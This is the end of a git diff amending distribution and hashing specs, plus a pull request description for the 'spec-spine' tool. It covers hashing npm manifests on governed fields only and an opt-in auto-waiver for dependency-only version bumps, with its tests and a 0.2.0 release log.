+  manifest including the spec-binding metadata the gate exists to protect.
+  Git-diff mode only (`--paths-from` carries no content). The freshness
+  half of the dependabot story is spec 004 §3.5's governance-projection
+  hashing, which keeps a dep-only bump from staling the committed index.
 
 ### 3.6 Granularity reconciliation (the crate-spec vs file-establishes question)
 

--- a/specs/007-distribution/spec.md
+++ b/specs/007-distribution/spec.md
@@ -183,3 +183,12 @@ The runbook step lives in `docs/releasing.md`.
 - **Windows-on-ARM, musl, and 32-bit** prebuilt binaries: out of the v1 triple
   set; those hosts use `cargo install` (§3.4). Adding a triple is an additive
   change to the §3.2 map and the release matrix together.
+
+## Release log
+
+- **0.2.0 (2026-06-11).** First post-bootstrap feature release: the specs
+  004/005 dependency-only cutover (governance-projection hashing of npm
+  manifests + the opt-in `auto_waive_dependency_only` coupling waiver).
+  Hash-fold semantics change re-baselines npm-bearing adopters — one
+  `spec-spine index` re-run on upgrade. Same five-triple matrix, same
+  launcher shim; no distribution-mechanics change.


### PR DESCRIPTION
## Summary

Dependency-only diffs (version strings inside `package.json` dependency tables) previously failed twice with no bot-usable escape: the byte-hashed manifest staled the committed index (exit 2 at `index check`), and the owned manifest fired `C-001` with a bot that can edit neither specs nor PR bodies.

Two paired amendments close it:

- **Spec 004 §3.5 — governance-projection hashing.** npm manifests fold into the index content hash as the canonical JSON of exactly the fields discovery reads (`name`, `version`, `workspaces`, metadata namespace — `npm_hash_projection`). Dependency tables are not a governed input, so a bump leaves the committed index fresh; any governed-field change still stales. Unparseable manifests fall back to raw bytes (over-hash, fail-closed). Cargo/pnpm manifests unchanged.
- **Spec 005 §3.5 — mechanical auto-waiver, opt-in.** `[coupling] auto_waive_dependency_only = true` (default `false`). When no PR-body waiver exists, the CLI compares parsed base/head JSON (merge-base correct) of every non-bypassed changed path: all must be `package.json` manifests equal everywhere except version strings in the four dependency tables, same package keys. A new/removed package, a `scripts` edit, spec-binding metadata, or an unparseable/created/deleted manifest refuses fail-closed. Deliberately NOT path bypass — that would exempt the spec-binding metadata the gate protects.

New pure core module `dep_only.rs` (11 unit tests), `is_bypassed_path` helper, 3 E2E CLI tests (fresh+auto-waived bump; opt-in default-off drift; smuggled-scripts-edit refusal). Specs 000 (config key) and 007 (release log) amended; version 0.2.0 (hash-fold re-baseline: adopters re-run `spec-spine index` once on upgrade).

## Testing

- `cargo test --workspace` — 20 suites green (incl. 11 new dep_only unit tests + 3 new E2E couple tests)
- Dogfood: `compile` 0 warnings, `lint --fail-on-warn` clean, `index`/`index check` fresh, `couple --base origin/main` — OK, 14 paths, no drift

## After merge

Tag `v0.2.0` → release workflow publishes the five platform packages + main npm package. Then template-encore: bump the `spec-spine` pin to 0.2.0, set `auto_waive_dependency_only = true`, regenerate the index once, and record the spec amendment (000-bootstrap/014).